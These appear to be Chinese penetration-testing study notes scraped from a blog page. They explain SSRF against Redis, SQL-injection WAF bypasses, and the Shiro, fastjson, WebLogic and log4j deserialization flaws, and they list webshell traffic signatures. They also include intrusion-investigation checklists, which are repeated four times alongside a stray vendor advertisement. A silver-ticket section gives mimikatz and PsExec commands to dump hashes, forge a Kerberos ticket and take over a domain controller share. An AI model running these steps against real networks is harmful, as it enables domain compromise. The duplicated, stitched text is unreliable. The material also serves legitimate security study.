ssrf利用ridis打内网
方法二:通过【curl命令】和【gopher协议】远程攻击内网redis
gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用中gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样就可以解决漏洞点不在GET参数的问题了。
gopher协议可配合linux下的curl命令伪造POST请求包发给内网主机。
此种方法能攻击成功的前提条件是:redis是以root权限运行的。
sql注入绕waf
大小写 (UnIOn SeleCT)
加密解密 (一般用于免杀、加密字符串)
编码解码 (0x23、0x61656d696e、%73elect、%27、%0a、%00)
特殊符号 (表情符号、各种形状奇奇怪怪的符号)
函数替换 (substring、mid、substr、and = && 、 or = || ‘aaa’ like ‘aaa’)
注释符号混用 (--+、/**/、#、/*!select*/、/*!12345select*/
分块传输绕过 (Transfer-Encoding: chunked )
另类字符集绕过 (ibm037)and user>0-- 字符串与整形作对比报错)
数据库特性 (and user>0-- 字符串与整形作对比报错)
换行/N绕过 (select * from admin where name = \N union select 1,2,3)
协议层绕过 (Content-Type为application/x-www-form-urlencoded 修改成 multipart/form-data)
垃圾数据溢出 (传输大量数据,超过waf识别的容量)
HTTP参数污染 (?id=1&id=2&id=3 php取最后一个)
sql注入预编译原理
众所周知,数据库会对sql进行语法分析,词法分析,语义分析,如果一条sql
采用拼接方式
例如:
select * from test where id= ’ + x + ’
x= 1’;delete from 'test
这样进入数据库就变成了
select * from test where id= ’ 1 ';
delete from 'test’
会被数据库解析成两条sql
但是预编译会让数据库跳过编译阶段,也就无法就进行词法分析,关键字不会被拆开,所有参数 直接 变成字符串 进入 数据库执行器执行。
可能数据库执行的sql是这样(推测)
select * from test where id= ’ 1 delete from test ’
(没有词法分析 所有关键字都成为了字符串的一部分)
也就失去了sql注入的能力
mybatis漏洞原理
作为攻击者,需要将已有key对应的value覆盖为自己的恶意序列化数据,在cache过期时间内,
如果再次执行相同的查询访问操作,恶意数据就会被作为已有key的对应value被反序列化,
从而形成MyBatis所在服务器上的RCE
mysql5.0以上和以下的区别
mysql5.0以及5.0以上的版本都存在一个系统自带的系统数据库,叫做:information_schema,
而5.0以下的版本不存。information_schema下面又包含了这几张表:schemata、tables、columns。
这三张表依次分别存放着字段:(schema_name)、(table_name、table_schema)、(table_schema、table_name、column_name),
其次就是5.0以上都是多用户,5.0以下是单用户。
udf提权原理
关于UDF提权,也是现在比较常见的MySQL类提权方式之一。 它的提权原理也非常简单! 即是利用了root 高权限,
创建带有调用cmd的函数的udf.dll动态链接库! 这样一来我们就可以利用 system权限进行提权操作了!
xss漏洞区别
1.反射型 用户输入的注入代通过浏览器传入到服务器后,又被目标服务器反射回来,
在浏览器中解析并执行。 2.存储型 用户输入的注入代码,通过浏览器传入到服务器后,
被永久存放在目标服务器的数据库或文件中。 当用户再次访问这个注入代码的页面就出发了xss漏洞 3.Dom型xss 它和反射型以及存储型xss的区别在于,
dom型xss的代码并不需要服务器解析响应的直接参与,触发xss靠的是浏览器的dom解析,可以认为完全是客户端的事情。
流量
冰蝎 2.0 强特征是 accept 里面有个 q=.2
冰蝎 3.0 Content-Type: application/octet-stream
冰蝎 4.0 ua头 referer头 accept 默认aes128 秘闻长度16整数倍
蚁剑是 ua 有 answord 蚁剑的加密特征是以 "0x.....="开头
哥斯拉 pass 字段
菜刀流量存在一些特征字 eval base64
AWVS 扫描器的特征 :主要是看请求包中是否含有 acunetix wvs 字段
Nessus 扫描器的特征:nessus 字段
java漏洞
shiro(Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。
shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,
在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、
AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是:
获取rememberMe cookie ->base64 解码->AES解密(加密密钥硬编码)->反序列化(未作过滤处理)。
但是AES加密的密钥Key被硬编码(密钥初始就被定义好不能动态改变的)在代码里,这就意味着每个人通过源代码都能拿到AES加密的密钥。
因此,攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、base64编码后,作为cookie的rememberMe字段发送。
Shiro将rememberMe进行解密并且反序列化,最终就造成了反序列化的RCE漏洞。只要rememberMe的AES加密密钥泄露,
无论shiro是什么版本都可能会导致该漏洞的产生.硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。
如果在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,那么就可能存在此漏洞。
————————————————
)
shrio550和721的区别
主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie的
Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。
利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击。
fastjson(4.fastjson反序列化漏洞原理
使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,
在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,
并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,
只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。
常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl,
其中有个dataSourceName方法支持传入一个rmi的源,只要解析其中的url就会支持远程调用!
)(@tamp)
weblogic(Weblogic的WLS Security组件对外提供webservice服务,
其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,
导致可执行任意命令。
1.3漏洞利用
访问 /wls-wsat/CoordinatorPortType,返回如下页面,则可能存在此漏洞。)
log4j(log4j2框架下的lookup查询服务提供了{}字段解析功能,
传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务
(可能是攻击者部署好的恶意代码)。
攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,
在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,
造成了远程代码执行(可反弹shell到指定服务器)。)(流量jnd${log4j:123}i)
**Linux 入侵排查思路**
第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->
第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->
第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->
第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->
第五步:分析中间件、Web 日志,如 access_log 文件->
第六步:调用命令 last/lastb 翻阅登录日志->
第七步:分析/var/log/cron 文件查看历史计划任务,
第八步->分析 history 日志分析操作命令记录->
最后一步:分析 redis、sql server、mysql、oracle 等日志文件
**Windows 入侵排查思路**
第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通
过 tasklist 进行进程定位)->
第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->
第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->
第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->
第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->
第六步:运行 taskschd.msc 排查有无可疑的计划任务->
第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->
第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的
access.log 日志文件。
**Linux 入侵排查思路**
第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->
第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->
第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->
第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->
第五步:分析中间件、Web 日志,如 access_log 文件->
第六步:调用命令 last/lastb 翻阅登录日志->
第七步:分析/var/log/cron 文件查看历史计划任务,
第八步->分析 history 日志分析操作命令记录->
最后一步:分析 redis、sql server、mysql、oracle 等日志文件
**Windows 入侵排查思路**
第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通
过 tasklist 进行进程定位)->
第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->
第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->
第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->
第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->
第六步:运行 taskschd.msc 排查有无可疑的计划任务->
第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->
第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的
access.log 日志文件。
**Linux 入侵排查思路**
第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->
第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->
第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->
第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->
第五步:分析中间件、Web 日志,如 access_log 文件->
第六步:调用命令 last/lastb 翻阅登录日志->
第七步:分析/var/log/cron 文件查看历史计划任务,
第八步->分析 history 日志分析操作命令记录->
最后一步:分析 redis、sql server、mysql、oracle 等日志文件
**Windows 入侵排查思路**
第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通
过 tasklist 进行进程定位)->
第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->
第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->
第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->
第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->
第六步:运行 taskschd.msc 排查有无可疑的计划任务->
第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->
第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的
access.log 日志文件。
**Linux 入侵排查思路**
第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->
第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->
第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->
第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->
第五步:分析中间件、Web 日志,如 access_log 文件->
第六步:调用命令 last/lastb 翻阅登录日志->
第七步:分析/var/log/cron 文件查看历史计划任务,
第八步->分析 history 日志分析操作命令记录->
最后一步:分析 redis、sql server、mysql、oracle 等日志文件
**Windows 入侵排查思路**
第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通
过 tasklist 进行进程定位)->
第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->
第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->
第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->
第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->
第六步:运行 taskschd.msc 排查有无可疑的计划任务->
第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->
第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的
access.log 日志文件。
,
陆续推出青藤万相·主机自适应安全平台、青藤蜂巢·云原生安全平台、青藤猎鹰·威胁狩猎平台、
青藤雷火·AI-Webshell检测系统、青藤零域
制作白银票据 (上篇黄金票据已经截过图,主要使用用工具还是mimikatz和psexec)
制作白银票据的条件:
1.域名称
2.域的SID值
3.域的服务账户的密码HASH
4.伪造的用户名,可以是任意用户名,一般伪造administrator
5.需要访问的服务
第一步:
管理员权限运行
mimikatzprivilege::debug #提升权限
sekurlsa::logonpasswords #获取service账户hash 和sid(同一个域下得sid一样)
第二步:
清空本地票据缓存
kerberos::purge #清理本地票据缓存
kerberos::list #查看本地保存的票据
第三步:
伪造白银票据并导入
kerberos::golden /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /target:win08.superman.com /rc4:f6f19db774c63e49e9af61346adff204 /service:cifs /user:administrator /ptt
第四步:
访问域控的共享目录
dir \\win08\c$
远程登陆,执行命令
PsExec.exe \\win08 cmd.exe
whoami #查看权限
黄金票据
1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]
2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
weblogic原理
1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883)
2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14644、CVE-2020-14645)还有利用IIOP协议的CVE-2020-2551
3.通过 javabean XML方式发送反序列化数据。(CVE2017-3506->CVE-2017-10271->CVE2019-2725->CVE-2019-2729)
扫一扫
2539
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
